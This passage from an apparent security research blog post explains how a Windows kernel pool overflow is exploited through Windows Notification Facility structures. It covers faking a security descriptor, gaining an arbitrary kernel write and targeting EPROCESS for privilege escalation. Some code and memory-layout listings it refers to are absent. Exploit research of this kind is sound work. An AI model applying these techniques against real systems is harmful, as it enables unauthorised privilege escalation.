It is also possible to construct your own AVL tree by corrupting the TreeLinks pointers, however, the main caveat with that is that care needs to be taken to avoid safe unlinking protection occurring.
As we can see from Windows Mitigations, Microsoft has implemented a significant number of mitigations to make heap and pool exploitation more difficult.
In a future blog post I will discuss in depth how this affects this specific exploit and what clean-up is necessary.
Security Descriptor
One other challenge I ran into whilst developing this exploit was due to the security descriptor.
Initially I set this to be the address of a security descriptor within userland, which was used in NtCreateWnfStateName.
Performing some comparisons between an unmodified security descriptor within kernel space and the one in userspace demonstrated that these were different.
I then attempted to provide the fake security descriptor with the same values. This didn't work as expected and NtUpdateWnfStateData was still returning permission denied (-1073741790).
After experimenting some more, patching up a fake security descriptor with the following values worked and the data was successfully written to my arbitrary location:
Initially when testing out the arbitrary write, I was expecting a kernel crash near the memcpy location when I set the StateData pointer to 0x6161616161616161. However, in practice the execution of ExpWnfWriteStateData was found to be performed in a worker thread. When an access violation occurs, this is caught and the NT status -1073741819, which is STATUS_ACCESS_VIOLATION, is propagated back to userland. This made initial debugging more challenging, as the code around that function was a significantly hot path and using conditional breakpoints led to a huge program standstill.
Anyhow, typically after achieving an arbitrary write an attacker will leverage it either to perform a data-only privilege escalation or to achieve arbitrary code execution.
As we are using CVE-2021-31955 for the EPROCESS address leak we continue our research down this path.
To recap, the following conditions needed to be met:
1) The internal StateName matched up with the correct internal StateName so the correct external StateName can be found when required.
2) The Security Descriptor passing the checks in ExpWnfCheckCallerAccess.
3) The offsets of DataSize and AllocSize being appropriate for the area of memory desired.
So in summary we have the following memory layout after the overflow has occurred and the EPROCESS being treated as a _WNF_STATE_DATA:
We can then demonstrate corrupting the EPROCESS struct:
These approaches and pros and cons have been discussed previously by EDG team members whilst exploiting a vulnerability in KTM.
The next stage will be discussed within a follow-up blog post as there are still some challenges to face before reliable privilege escalation is achieved.
Summary
In summary we have described more about the vulnerability and how it can be triggered. We have seen how WNF can be leveraged to enable a novel set of exploit primitives. That is all for now in part 1! In the next blog I will cover reliability improvements, kernel memory clean up and continuation.